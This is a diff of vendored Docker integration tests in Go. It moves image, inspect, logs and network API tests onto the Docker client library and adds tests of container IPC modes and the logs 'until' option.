-	getImages := func(filter string) []image {
-		v := url.Values{}
-		v.Set("filter", filter)
-		status, b, err := sockRequest("GET", "/images/json?"+v.Encode(), nil)
-		c.Assert(err, checker.IsNil)
-		c.Assert(status, checker.Equals, http.StatusOK)
-
-		var images []image
-		err = json.Unmarshal(b, &images)
+	getImages := func(filter string) []types.ImageSummary {
+		filters := filters.NewArgs()
+		filters.Add("reference", filter)
+		options := types.ImageListOptions{
+			All:     false,
+			Filters: filters,
+		}
+		images, err := cli.ImageList(context.Background(), options)
 		c.Assert(err, checker.IsNil)
 
 		return images
@@ -48,80 +55,106 @@ func (s *DockerSuite) TestAPIImagesFilter(c *check.C) {
 }
 
 func (s *DockerSuite) TestAPIImagesSaveAndLoad(c *check.C) {
-	// TODO Windows to Windows CI: Investigate further why this test fails.
 	testRequires(c, Network)
-	testRequires(c, DaemonIsLinux)
-	out, err := buildImage("saveandload", "FROM busybox\nENV FOO bar", false)
-	c.Assert(err, checker.IsNil)
-	id := strings.TrimSpace(out)
+	buildImageSuccessfully(c, "saveandload", build.WithDockerfile("FROM busybox\nENV FOO bar"))
+	id := getIDByName(c, "saveandload")
 
-	res, body, err := sockRequestRaw("GET", "/images/"+id+"/get", nil, "")
+	res, body, err := request.Get("/images/" + id + "/get")
 	c.Assert(err, checker.IsNil)
 	defer body.Close()
 	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
 
 	dockerCmd(c, "rmi", id)
 
-	res, loadBody, err := sockRequestRaw("POST", "/images/load", body, "application/x-tar")
+	res, loadBody, err := request.Post("/images/load", request.RawContent(body), request.ContentType("application/x-tar"))
 	c.Assert(err, checker.IsNil)
 	defer loadBody.Close()
 	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
 
-	inspectOut := inspectField(c, id, "Id")
+	inspectOut := cli.InspectCmd(c, id, cli.Format(".Id")).Combined()
 	c.Assert(strings.TrimSpace(string(inspectOut)), checker.Equals, id, check.Commentf("load did not work properly"))
 }
 
 func (s *DockerSuite) TestAPIImagesDelete(c *check.C) {
-	if daemonPlatform != "windows" {
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	if testEnv.OSType != "windows" {
 		testRequires(c, Network)
 	}
 	name := "test-api-images-delete"
-	out, err := buildImage(name, "FROM busybox\nENV FOO bar", false)
-	c.Assert(err, checker.IsNil)
-	id := strings.TrimSpace(out)
+	buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nENV FOO bar"))
+	id := getIDByName(c, name)
 
 	dockerCmd(c, "tag", name, "test:tag1")
 
-	status, _, err := sockRequest("DELETE", "/images/"+id, nil)
-	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusConflict)
+	_, err = cli.ImageRemove(context.Background(), id, types.ImageRemoveOptions{})
+	c.Assert(err.Error(), checker.Contains, "unable to delete")
 
-	status, _, err = sockRequest("DELETE", "/images/test:noexist", nil)
-	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusNotFound) //Status Codes:404 – no such image
+	_, err = cli.ImageRemove(context.Background(), "test:noexist", types.ImageRemoveOptions{})
+	c.Assert(err.Error(), checker.Contains, "No such image")
 
-	status, _, err = sockRequest("DELETE", "/images/test:tag1", nil)
+	_, err = cli.ImageRemove(context.Background(), "test:tag1", types.ImageRemoveOptions{})
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK)
 }
 
 func (s *DockerSuite) TestAPIImagesHistory(c *check.C) {
-	if daemonPlatform != "windows" {
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	if testEnv.OSType != "windows" {
 		testRequires(c, Network)
 	}
 	name := "test-api-images-history"
-	out, err := buildImage(name, "FROM busybox\nENV FOO bar", false)
+	buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nENV FOO bar"))
+	id := getIDByName(c, name)
+
+	historydata, err := cli.ImageHistory(context.Background(), id)
 	c.Assert(err, checker.IsNil)
 
-	id := strings.TrimSpace(out)
+	c.Assert(historydata, checker.Not(checker.HasLen), 0)
+	var found bool
+	for _, tag := range historydata[0].Tags {
+		if tag == "test-api-images-history:latest" {
+			found = true
+			break
+		}
+	}
+	c.Assert(found, checker.True)
+}
 
-	status, body, err := sockRequest("GET", "/images/"+id+"/history", nil)
-	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK)
+func (s *DockerSuite) TestAPIImagesImportBadSrc(c *check.C) {
+	testRequires(c, Network, SameHostDaemon)
 
-	var historydata []types.ImageHistory
-	err = json.Unmarshal(body, &historydata)
-	c.Assert(err, checker.IsNil, check.Commentf("Error on unmarshal"))
+	server := httptest.NewServer(http.NewServeMux())
+	defer server.Close()
+
+	tt := []struct {
+		statusExp int
+		fromSrc   string
+	}{
+		{http.StatusNotFound, server.URL + "/nofile.tar"},
+		{http.StatusNotFound, strings.TrimPrefix(server.URL, "http://") + "/nofile.tar"},
+		{http.StatusNotFound, strings.TrimPrefix(server.URL, "http://") + "%2Fdata%2Ffile.tar"},
+		{http.StatusInternalServerError, "%2Fdata%2Ffile.tar"},
+	}
+
+	for _, te := range tt {
+		res, _, err := request.Post(strings.Join([]string{"/images/create?fromSrc=", te.fromSrc}, ""), request.JSON)
+		c.Assert(err, check.IsNil)
+		c.Assert(res.StatusCode, checker.Equals, te.statusExp)
+		c.Assert(res.Header.Get("Content-Type"), checker.Equals, "application/json")
+	}
 
-	c.Assert(historydata, checker.Not(checker.HasLen), 0)
-	c.Assert(historydata[0].Tags[0], checker.Equals, "test-api-images-history:latest")
 }
 
 // #14846
 func (s *DockerSuite) TestAPIImagesSearchJSONContentType(c *check.C) {
 	testRequires(c, Network)
 
-	res, b, err := sockRequestRaw("GET", "/images/search?term=test", nil, "application/json")
+	res, b, err := request.Get("/images/search?term=test", request.JSON)
 	c.Assert(err, check.IsNil)
 	b.Close()
 	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
@@ -131,32 +164,21 @@ func (s *DockerSuite) TestAPIImagesSearchJSONContentType(c *check.C) {
 // Test case for 30027: image size reported as -1 in v1.12 client against v1.13 daemon.
 // This test checks to make sure both v1.12 and v1.13 client against v1.13 daemon get correct `Size` after the fix.
 func (s *DockerSuite) TestAPIImagesSizeCompatibility(c *check.C) {
-	status, b, err := sockRequest("GET", "/images/json", nil)
-	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK)
-	var images []types.ImageSummary
-	err = json.Unmarshal(b, &images)
+	apiclient := testEnv.APIClient()
+	defer apiclient.Close()
+
+	images, err := apiclient.ImageList(context.Background(), types.ImageListOptions{})
 	c.Assert(err, checker.IsNil)
 	c.Assert(len(images), checker.Not(checker.Equals), 0)
 	for _, image := range images {
 		c.Assert(image.Size, checker.Not(checker.Equals), int64(-1))
 	}
 
-	type v124Image struct {
-		ID          string `json:"Id"`
-		ParentID    string `json:"ParentId"`
-		RepoTags    []string
-		RepoDigests []string
-		Created     int64
-		Size        int64
-		VirtualSize int64
-		Labels      map[string]string
-	}
-	status, b, err = sockRequest("GET", "/v1.24/images/json", nil)
+	apiclient, err = client.NewClientWithOpts(client.FromEnv, client.WithVersion("v1.24"))
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK)
-	var v124Images []v124Image
-	err = json.Unmarshal(b, &v124Images)
+	defer apiclient.Close()
+
+	v124Images, err := apiclient.ImageList(context.Background(), types.ImageListOptions{})
 	c.Assert(err, checker.IsNil)
 	c.Assert(len(v124Images), checker.Not(checker.Equals), 0)
 	for _, image := range v124Images {
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_info_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_info_test.go
deleted file mode 100644
index 1556099734..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_api_info_test.go
+++ /dev/null
@@ -1,53 +0,0 @@
-package main
-
-import (
-	"net/http"
-
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-func (s *DockerSuite) TestInfoAPI(c *check.C) {
-	endpoint := "/info"
-
-	status, body, err := sockRequest("GET", endpoint, nil)
-	c.Assert(status, checker.Equals, http.StatusOK)
-	c.Assert(err, checker.IsNil)
-
-	// always shown fields
-	stringsToCheck := []string{
-		"ID",
-		"Containers",
-		"ContainersRunning",
-		"ContainersPaused",
-		"ContainersStopped",
-		"Images",
-		"LoggingDriver",
-		"OperatingSystem",
-		"NCPU",
-		"OSType",
-		"Architecture",
-		"MemTotal",
-		"KernelVersion",
-		"Driver",
-		"ServerVersion",
-		"SecurityOptions"}
-
-	out := string(body)
-	for _, linePrefix := range stringsToCheck {
-		c.Assert(out, checker.Contains, linePrefix)
-	}
-}
-
-func (s *DockerSuite) TestInfoAPIVersioned(c *check.C) {
-	testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later
-	endpoint := "/v1.20/info"
-
-	status, body, err := sockRequest("GET", endpoint, nil)
-	c.Assert(status, checker.Equals, http.StatusOK)
-	c.Assert(err, checker.IsNil)
-
-	out := string(body)
-	c.Assert(out, checker.Contains, "ExecutionDriver")
-	c.Assert(out, checker.Contains, "not supported")
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_test.go
index 546b224c92..68055b6c14 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_test.go
@@ -1,15 +1,17 @@
 package main
 
 import (
+	"context"
 	"encoding/json"
-	"net/http"
 	"strings"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/versions/v1p20"
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/docker/docker/pkg/stringutils"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/go-check/check"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 func (s *DockerSuite) TestInspectAPIContainerResponse(c *check.C) {
@@ -26,7 +28,7 @@ func (s *DockerSuite) TestInspectAPIContainerResponse(c *check.C) {
 
 	var cases []acase
 
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		cases = []acase{
 			{"v1.25", append(keysBase, "Mounts")},
 		}
@@ -105,20 +107,16 @@ func (s *DockerSuite) TestInspectAPIContainerVolumeDriver(c *check.C) {
 
 func (s *DockerSuite) TestInspectAPIImageResponse(c *check.C) {
 	dockerCmd(c, "tag", "busybox:latest", "busybox:mytag")
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
 
-	endpoint := "/images/busybox/json"
-	status, body, err := sockRequest("GET", endpoint, nil)
-
+	imageJSON, _, err := cli.ImageInspectWithRaw(context.Background(), "busybox")
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK)
 
-	var imageJSON types.ImageInspect
-	err = json.Unmarshal(body, &imageJSON)
-	c.Assert(err, checker.IsNil, check.Commentf("Unable to unmarshal body for latest version"))
 	c.Assert(imageJSON.RepoTags, checker.HasLen, 2)
-
-	c.Assert(stringutils.InSlice(imageJSON.RepoTags, "busybox:latest"), checker.Equals, true)
-	c.Assert(stringutils.InSlice(imageJSON.RepoTags, "busybox:mytag"), checker.Equals, true)
+	assert.Check(c, is.Contains(imageJSON.RepoTags, "busybox:latest"))
+	assert.Check(c, is.Contains(imageJSON.RepoTags, "busybox:mytag"))
 }
 
 // #17131, #17139, #17173
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_unix_test.go
deleted file mode 100644
index f49a139c28..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_unix_test.go
+++ /dev/null
@@ -1,35 +0,0 @@
-// +build !windows
-
-package main
-
-import (
-	"encoding/json"
-	"fmt"
-	"net/http"
-
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-// #16665
-func (s *DockerSuite) TestInspectAPICpusetInConfigPre120(c *check.C) {
-	testRequires(c, DaemonIsLinux)
-	testRequires(c, cgroupCpuset)
-
-	name := "cpusetinconfig-pre120"
-	dockerCmd(c, "run", "--name", name, "--cpuset-cpus", "0", "busybox", "true")
-
-	status, body, err := sockRequest("GET", fmt.Sprintf("/v1.19/containers/%s/json", name), nil)
-	c.Assert(status, check.Equals, http.StatusOK)
-	c.Assert(err, check.IsNil)
-
-	var inspectJSON map[string]interface{}
-	err = json.Unmarshal(body, &inspectJSON)
-	c.Assert(err, checker.IsNil, check.Commentf("unable to unmarshal body for version 1.19"))
-
-	config, ok := inspectJSON["Config"]
-	c.Assert(ok, checker.True, check.Commentf("Unable to find 'Config'"))
-	cfg := config.(map[string]interface{})
-	_, ok = cfg["Cpuset"]
-	c.Assert(ok, checker.True, check.Commentf("API version 1.19 expected to include Cpuset in 'Config'"))
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_ipcmode_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_ipcmode_test.go
new file mode 100644
index 0000000000..886ff88d20
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_ipcmode_test.go
@@ -0,0 +1,213 @@
+// build +linux
+package main
+
+import (
+	"bufio"
+	"context"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"strings"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
+	"github.com/go-check/check"
+)
+
+/* testIpcCheckDevExists checks whether a given mount (identified by its
+ * major:minor pair from /proc/self/mountinfo) exists on the host system.
+ *
+ * The format of /proc/self/mountinfo is like:
+ *
+ * 29 23 0:24 / /dev/shm rw,nosuid,nodev shared:4 - tmpfs tmpfs rw
+ *       ^^^^\
+ *            - this is the minor:major we look for
+ */
+func testIpcCheckDevExists(mm string) (bool, error) {
+	f, err := os.Open("/proc/self/mountinfo")
+	if err != nil {
+		return false, err
+	}
+	defer f.Close()
+
+	s := bufio.NewScanner(f)
+	for s.Scan() {
+		fields := strings.Fields(s.Text())
+		if len(fields) < 7 {
+			continue
+		}
+		if fields[2] == mm {
+			return true, nil
+		}
+	}
+
+	return false, s.Err()
+}
+
+// testIpcNonePrivateShareable is a helper function to test "none",
+// "private" and "shareable" modes.
+func testIpcNonePrivateShareable(c *check.C, mode string, mustBeMounted bool, mustBeShared bool) {
+	cfg := container.Config{
+		Image: "busybox",
+		Cmd:   []string{"top"},
+	}
+	hostCfg := container.HostConfig{
+		IpcMode: container.IpcMode(mode),
+	}
+	ctx := context.Background()
+
+	client := testEnv.APIClient()
+
+	resp, err := client.ContainerCreate(ctx, &cfg, &hostCfg, nil, "")
+	c.Assert(err, checker.IsNil)
+	c.Assert(len(resp.Warnings), checker.Equals, 0)
+
+	err = client.ContainerStart(ctx, resp.ID, types.ContainerStartOptions{})
+	c.Assert(err, checker.IsNil)
+
+	// get major:minor pair for /dev/shm from container's /proc/self/mountinfo
+	cmd := "awk '($5 == \"/dev/shm\") {printf $3}' /proc/self/mountinfo"
+	mm := cli.DockerCmd(c, "exec", "-i", resp.ID, "sh", "-c", cmd).Combined()
+	if !mustBeMounted {
+		c.Assert(mm, checker.Equals, "")
+		// no more checks to perform
+		return
+	}
+	c.Assert(mm, checker.Matches, "^[0-9]+:[0-9]+$")
+
+	shared, err := testIpcCheckDevExists(mm)
+	c.Assert(err, checker.IsNil)
+	c.Logf("[testIpcPrivateShareable] ipcmode: %v, ipcdev: %v, shared: %v, mustBeShared: %v\n", mode, mm, shared, mustBeShared)
+	c.Assert(shared, checker.Equals, mustBeShared)
+}
+
+/* TestAPIIpcModeNone checks the container "none" IPC mode
+ * (--ipc none) works as expected. It makes sure there is no
+ * /dev/shm mount inside the container.
+ */
+func (s *DockerSuite) TestAPIIpcModeNone(c *check.C) {
+	testRequires(c, DaemonIsLinux, MinimumAPIVersion("1.32"))
+	testIpcNonePrivateShareable(c, "none", false, false)
+}
+
+/* TestAPIIpcModePrivate checks the container private IPC mode
+ * (--ipc private) works as expected. It gets the minor:major pair
+ * of /dev/shm mount from the container, and makes sure there is no
+ * such pair on the host.
+ */
+func (s *DockerSuite) TestAPIIpcModePrivate(c *check.C) {
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
+	testIpcNonePrivateShareable(c, "private", true, false)
+}
+
+/* TestAPIIpcModeShareable checks the container shareable IPC mode
+ * (--ipc shareable) works as expected. It gets the minor:major pair
+ * of /dev/shm mount from the container, and makes sure such pair
+ * also exists on the host.
+ */
+func (s *DockerSuite) TestAPIIpcModeShareable(c *check.C) {
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
+	testIpcNonePrivateShareable(c, "shareable", true, true)
+}
+
+// testIpcContainer is a helper function to test --ipc container:NNN mode in various scenarios
+func testIpcContainer(s *DockerSuite, c *check.C, donorMode string, mustWork bool) {
+	cfg := container.Config{
+		Image: "busybox",
+		Cmd:   []string{"top"},
+	}
+	hostCfg := container.HostConfig{
+		IpcMode: container.IpcMode(donorMode),
+	}
+	ctx := context.Background()
+
+	client := testEnv.APIClient()
+
+	// create and start the "donor" container
+	resp, err := client.ContainerCreate(ctx, &cfg, &hostCfg, nil, "")
+	c.Assert(err, checker.IsNil)
+	c.Assert(len(resp.Warnings), checker.Equals, 0)
+	name1 := resp.ID
+
+	err = client.ContainerStart(ctx, name1, types.ContainerStartOptions{})
+	c.Assert(err, checker.IsNil)
+
+	// create and start the second container
+	hostCfg.IpcMode = container.IpcMode("container:" + name1)
+	resp, err = client.ContainerCreate(ctx, &cfg, &hostCfg, nil, "")
+	c.Assert(err, checker.IsNil)
+	c.Assert(len(resp.Warnings), checker.Equals, 0)
+	name2 := resp.ID
+
+	err = client.ContainerStart(ctx, name2, types.ContainerStartOptions{})
+	if !mustWork {
+		// start should fail with a specific error
+		c.Assert(err, checker.NotNil)
+		c.Assert(fmt.Sprintf("%v", err), checker.Contains, "non-shareable IPC")
+		// no more checks to perform here
+		return
+	}
+
+	// start should succeed
+	c.Assert(err, checker.IsNil)
+
+	// check that IPC is shared
+	// 1. create a file in the first container
+	cli.DockerCmd(c, "exec", name1, "sh", "-c", "printf covfefe > /dev/shm/bar")
+	// 2. check it's the same file in the second one
+	out := cli.DockerCmd(c, "exec", "-i", name2, "cat", "/dev/shm/bar").Combined()
+	c.Assert(out, checker.Matches, "^covfefe$")
+}
+
+/* TestAPIIpcModeShareableAndContainer checks that a container created with
+ * --ipc container:ID can use IPC of another shareable container.
+ */
+func (s *DockerSuite) TestAPIIpcModeShareableAndContainer(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	testIpcContainer(s, c, "shareable", true)
+}
+
+/* TestAPIIpcModePrivateAndContainer checks that a container created with
+ * --ipc container:ID can NOT use IPC of another private container.
+ */
+func (s *DockerSuite) TestAPIIpcModePrivateAndContainer(c *check.C) {
+	testRequires(c, DaemonIsLinux, MinimumAPIVersion("1.32"))
+	testIpcContainer(s, c, "private", false)
+}
+
+/* TestAPIIpcModeHost checks that a container created with --ipc host
+ * can use IPC of the host system.
+ */
+func (s *DockerSuite) TestAPIIpcModeHost(c *check.C) {
+	testRequires(c, DaemonIsLinux, SameHostDaemon, NotUserNamespace)
+
+	cfg := container.Config{
+		Image: "busybox",
+		Cmd:   []string{"top"},
+	}
+	hostCfg := container.HostConfig{
+		IpcMode: container.IpcMode("host"),
+	}
+	ctx := context.Background()
+
+	client := testEnv.APIClient()
+	resp, err := client.ContainerCreate(ctx, &cfg, &hostCfg, nil, "")
+	c.Assert(err, checker.IsNil)
+	c.Assert(len(resp.Warnings), checker.Equals, 0)
+	name := resp.ID
+
+	err = client.ContainerStart(ctx, name, types.ContainerStartOptions{})
+	c.Assert(err, checker.IsNil)
+
+	// check that IPC is shared
+	// 1. create a file inside container
+	cli.DockerCmd(c, "exec", name, "sh", "-c", "printf covfefe > /dev/shm/."+name)
+	// 2. check it's the same on the host
+	bytes, err := ioutil.ReadFile("/dev/shm/." + name)
+	c.Assert(err, checker.IsNil)
+	c.Assert(string(bytes), checker.Matches, "^covfefe$")
+	// 3. clean up
+	cli.DockerCmd(c, "exec", name, "rm", "-f", "/dev/shm/."+name)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_logs_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_logs_test.go
index 2e8ffa9bdc..e809b46c2f 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_api_logs_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_logs_test.go
@@ -3,12 +3,20 @@ package main
 import (
 	"bufio"
 	"bytes"
+	"context"
 	"fmt"
+	"io"
+	"io/ioutil"
 	"net/http"
+	"strconv"
 	"strings"
 	"time"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/internal/test/request"
+	"github.com/docker/docker/pkg/stdcopy"
 	"github.com/go-check/check"
 )
 
@@ -19,34 +27,31 @@ func (s *DockerSuite) TestLogsAPIWithStdout(c *check.C) {
 
 	type logOut struct {
 		out string
-		res *http.Response
 		err error
 	}
+
 	chLog := make(chan logOut)
+	res, body, err := request.Get(fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1&timestamps=1", id))
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
 
 	go func() {
-		res, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1&timestamps=1", id), nil, "")
-		if err != nil {
-			chLog <- logOut{"", nil, err}
-			return
-		}
 		defer body.Close()
 		out, err := bufio.NewReader(body).ReadString('\n')
 		if err != nil {
-			chLog <- logOut{"", nil, err}
+			chLog <- logOut{"", err}
 			return
 		}
-		chLog <- logOut{strings.TrimSpace(out), res, err}
+		chLog <- logOut{strings.TrimSpace(out), err}
 	}()
 
 	select {
 	case l := <-chLog:
 		c.Assert(l.err, checker.IsNil)
-		c.Assert(l.res.StatusCode, checker.Equals, http.StatusOK)
 		if !strings.HasSuffix(l.out, "hello") {
 			c.Fatalf("expected log output to container 'hello', but it does not")
 		}
-	case <-time.After(20 * time.Second):
+	case <-time.After(30 * time.Second):
 		c.Fatal("timeout waiting for logs to exit")
 	}
 }
@@ -54,13 +59,13 @@ func (s *DockerSuite) TestLogsAPIWithStdout(c *check.C) {
 func (s *DockerSuite) TestLogsAPINoStdoutNorStderr(c *check.C) {
 	name := "logs_test"
 	dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh")
-
-	status, body, err := sockRequest("GET", fmt.Sprintf("/containers/%s/logs", name), nil)
-	c.Assert(status, checker.Equals, http.StatusBadRequest)
+	cli, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
+	defer cli.Close()
 
+	_, err = cli.ContainerLogs(context.Background(), name, types.ContainerLogsOptions{})
 	expected := "Bad parameters: you must choose at least one stream"
-	c.Assert(getErrorMessage(c, body), checker.Contains, expected)
+	c.Assert(err.Error(), checker.Contains, expected)
 }
 
 // Regression test for #12704
@@ -69,7 +74,7 @@ func (s *DockerSuite) TestLogsAPIFollowEmptyOutput(c *check.C) {
 	t0 := time.Now()
 	dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "sleep", "10")
 
-	_, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1&stderr=1&tail=all", name), bytes.NewBuffer(nil), "")
+	_, body, err := request.Get(fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1&stderr=1&tail=all", name))
 	t1 := time.Now()
 	c.Assert(err, checker.IsNil)
 	body.Close()
@@ -81,7 +86,131 @@ func (s *DockerSuite) TestLogsAPIFollowEmptyOutput(c *check.C) {
 
 func (s *DockerSuite) TestLogsAPIContainerNotFound(c *check.C) {
 	name := "nonExistentContainer"
-	resp, _, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1&stderr=1&tail=all", name), bytes.NewBuffer(nil), "")
+	resp, _, err := request.Get(fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1&stderr=1&tail=all", name))
 	c.Assert(err, checker.IsNil)
 	c.Assert(resp.StatusCode, checker.Equals, http.StatusNotFound)
 }
+
+func (s *DockerSuite) TestLogsAPIUntilFutureFollow(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	name := "logsuntilfuturefollow"
+	dockerCmd(c, "run", "-d", "--name", name, "busybox", "/bin/sh", "-c", "while true; do date +%s; sleep 1; done")
+	c.Assert(waitRun(name), checker.IsNil)
+
+	untilSecs := 5
+	untilDur, err := time.ParseDuration(fmt.Sprintf("%ds", untilSecs))
+	c.Assert(err, checker.IsNil)
+	until := daemonTime(c).Add(untilDur)
+
+	client, err := client.NewEnvClient()
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	cfg := types.ContainerLogsOptions{Until: until.Format(time.RFC3339Nano), Follow: true, ShowStdout: true, Timestamps: true}
+	reader, err := client.ContainerLogs(context.Background(), name, cfg)
+	c.Assert(err, checker.IsNil)
+
+	type logOut struct {
+		out string
+		err error
+	}
+
+	chLog := make(chan logOut)
+
+	go func() {
+		bufReader := bufio.NewReader(reader)
+		defer reader.Close()
+		for i := 0; i < untilSecs; i++ {
+			out, _, err := bufReader.ReadLine()
+			if err != nil {
+				if err == io.EOF {
+					return
+				}
+				chLog <- logOut{"", err}
+				return
+			}
+
+			chLog <- logOut{strings.TrimSpace(string(out)), err}
+		}
+	}()
+
+	for i := 0; i < untilSecs; i++ {
+		select {
+		case l := <-chLog:
+			c.Assert(l.err, checker.IsNil)
+			i, err := strconv.ParseInt(strings.Split(l.out, " ")[1], 10, 64)
+			c.Assert(err, checker.IsNil)
+			c.Assert(time.Unix(i, 0).UnixNano(), checker.LessOrEqualThan, until.UnixNano())
+		case <-time.After(20 * time.Second):
+			c.Fatal("timeout waiting for logs to exit")
+		}
+	}
+}
+
+func (s *DockerSuite) TestLogsAPIUntil(c *check.C) {
+	testRequires(c, MinimumAPIVersion("1.34"))
+	name := "logsuntil"
+	dockerCmd(c, "run", "--name", name, "busybox", "/bin/sh", "-c", "for i in $(seq 1 3); do echo log$i; sleep 1; done")
+
+	client, err := client.NewEnvClient()
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	extractBody := func(c *check.C, cfg types.ContainerLogsOptions) []string {
+		reader, err := client.ContainerLogs(context.Background(), name, cfg)
+		c.Assert(err, checker.IsNil)
+
+		actualStdout := new(bytes.Buffer)
+		actualStderr := ioutil.Discard
+		_, err = stdcopy.StdCopy(actualStdout, actualStderr, reader)
+		c.Assert(err, checker.IsNil)
+
+		return strings.Split(actualStdout.String(), "\n")
+	}
+
+	// Get timestamp of second log line
+	allLogs := extractBody(c, types.ContainerLogsOptions{Timestamps: true, ShowStdout: true})
+	c.Assert(len(allLogs), checker.GreaterOrEqualThan, 3)
+
+	t, err := time.Parse(time.RFC3339Nano, strings.Split(allLogs[1], " ")[0])
+	c.Assert(err, checker.IsNil)
+	until := t.Format(time.RFC3339Nano)
+
+	// Get logs until the timestamp of second line, i.e. first two lines
+	logs := extractBody(c, types.ContainerLogsOptions{Timestamps: true, ShowStdout: true, Until: until})
+
+	// Ensure log lines after cut-off are excluded
+	logsString := strings.Join(logs, "\n")
+	c.Assert(logsString, checker.Not(checker.Contains), "log3", check.Commentf("unexpected log message returned, until=%v", until))
+}
+
+func (s *DockerSuite) TestLogsAPIUntilDefaultValue(c *check.C) {
+	name := "logsuntildefaultval"
+	dockerCmd(c, "run", "--name", name, "busybox", "/bin/sh", "-c", "for i in $(seq 1 3); do echo log$i; done")
+
+	client, err := client.NewEnvClient()
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	extractBody := func(c *check.C, cfg types.ContainerLogsOptions) []string {
+		reader, err := client.ContainerLogs(context.Background(), name, cfg)
+		c.Assert(err, checker.IsNil)
+
+		actualStdout := new(bytes.Buffer)
+		actualStderr := ioutil.Discard
+		_, err = stdcopy.StdCopy(actualStdout, actualStderr, reader)
+		c.Assert(err, checker.IsNil)
+
+		return strings.Split(actualStdout.String(), "\n")
+	}
+
+	// Get timestamp of second log line
+	allLogs := extractBody(c, types.ContainerLogsOptions{Timestamps: true, ShowStdout: true})
+
+	// Test with default value specified and parameter omitted
+	defaultLogs := extractBody(c, types.ContainerLogsOptions{Timestamps: true, ShowStdout: true, Until: "0"})
+	c.Assert(defaultLogs, checker.DeepEquals, allLogs)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_network_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_network_test.go
index 1cc66f0900..9c22cb7e3a 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_api_network_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_network_test.go
@@ -11,7 +11,9 @@ import (
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
 	"github.com/docker/docker/api/types/network"
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/internal/test/request"
 	"github.com/go-check/check"
 )
 
@@ -34,7 +36,7 @@ func (s *DockerSuite) TestAPINetworkCreateDelete(c *check.C) {
 			CheckDuplicate: true,
 		},
 	}
-	id := createNetwork(c, config, true)
+	id := createNetwork(c, config, http.StatusCreated)
 	c.Assert(isNetworkAvailable(c, name), checker.Equals, true)
 
 	// delete the network and make sure it is deleted
